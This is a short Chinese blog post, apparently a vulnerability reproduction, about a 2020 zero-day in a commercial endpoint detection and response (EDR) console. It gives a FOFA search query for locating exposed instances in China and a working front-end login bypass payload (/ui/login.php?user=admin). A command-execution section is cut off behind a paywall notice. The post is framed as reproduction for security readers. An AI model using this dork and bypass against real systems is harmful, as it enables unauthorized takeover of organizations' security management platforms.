0x01 描述
终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。
0x02 背景
2020年HW第1天,深某服EDR被爆0day的截图在广大安全朋友圈中广为传播,后续hw暂停。
0x03 漏洞复现
以fofa搜索为例子,搜索语法: title=“终端检测响应平台” && country=“CN”
前台登录绕过
payload: https://xxx.xxx.xxx.xxx/ui/login.php?user=username
这里的username是存在的用户名。一般默认的是admin
登录界面位置https://xxx.xxx.xxx.xxx/ui/login.php
payload: /ui/login.php?user=admin
成功绕过登录界面
命令执行
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
